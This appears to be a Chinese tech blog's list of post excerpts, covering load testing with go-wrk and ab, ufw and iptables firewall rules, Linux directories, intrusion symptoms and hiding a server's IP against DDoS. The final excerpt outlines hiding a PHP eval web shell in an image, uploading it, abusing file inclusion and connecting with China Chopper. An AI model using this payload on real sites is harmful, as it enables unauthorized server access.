爱上编程已很久

牛掰的 go语言 压力测试工具 https://github.com/tsliwowicz/go-wrk 安装：go get github.com/tsliwowicz/go-wrk 用法：./go-wrk -c 80 -d 5 http://192.168.1.1:8080/json 这会运行5秒的基准测试，使用80个去例程（连接） 更多请自行查找相关资料 ab使用 get 测试 ab -c 2 -n 10 http://domain/optimalServer.do?username=zhang

WSL里 Debian 默认使用的ufw设置防火墙 1. 检查UFW状态 sudo ufw status或sudo ufw status verbose 如果防火墙是激活状态的，输出结果类似如下：Status: inactive 默认情况下，UFW阻止所有入站连接并允许所有出站连接。 缺省策略在/etc/default/ufw文件中定义，可以使用sudo ufw default 命令更改 2.启用，停用 UFW 启用：sudo ufw enable 停用：sudo ufw disable 重置：sud

查看已有规则 iptables -L -n 下面我只打开22端口的命令 iptables -A INPUT -p tcp --dport 22 -j ACCEPT --tcp入端口( -p是指协议) iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT --tcp出端口 service iptables save --保存规则 路径在...

linux系统结构 /bin： bin是Binary的缩写, 这个目录存放着最经常使用的命令。 /boot： 这里存放的是启动Linux时使用的一些核心文件，包括一些连接文件以及镜像文件。 /etc： 这个目录用来存放所有的系统管理所需要的配置文件和子目录。 /home： 用户的主目录，在Linux中，每个用户都有一个自己的目录，一般该目录名是以用户的账号命名的。 /lib...

被入侵的症状 网站的页面打开的很慢，或者电子邮件要花很长时间才能发送出去。 服务器资源被榨干, CPU 资源来进行数字货币的采矿或者发送垃圾邮件，也可能消耗带宽来发动 DoS 攻击。 那么你应该查看那些东西呢? 检查 1 - 当前都有谁在登录? 其对应的命令是 w。运行 w 会输出如下结果： 08:32:55 up 98 days, 5:43, 2 users, load average: 0.05, 0.03, 0.00 USER TTY FROM L

防止DDoS攻击选择使用隐藏服务器真实IP 3种隐藏服务器真实IP的方法, 这可以让攻击者找不到攻击目标 >使用高防的盾机服务 >使用CDN技术 >使用域名导向 1: 前端架设反向代理服务器或上cdn。通过代理服务器再访问业务主机，不仅更安全，还可以加速用户访问。另外部署起来也容易，所以不管大中小型网站，都是非常推荐的。CDN隐藏真实IP，静态资源能加速的全加速，剩下PHP指向源站。cdn如果只用了国内的，则可以通过国外主机ping来发现真实ip； 2: 架设防火墙，仅允许白名单

1: 图片加马 将图片直接拖到edjpgcom.exe程序上 填入PHP一句话: <?php fputs(fopen("shell.txt","w")),'<?php eval($_POST['shell']);?> 可以看到 2: 上传图片 3: 利用文件包含执行上传文件生成后门 4: 通过菜刀连接webshell ...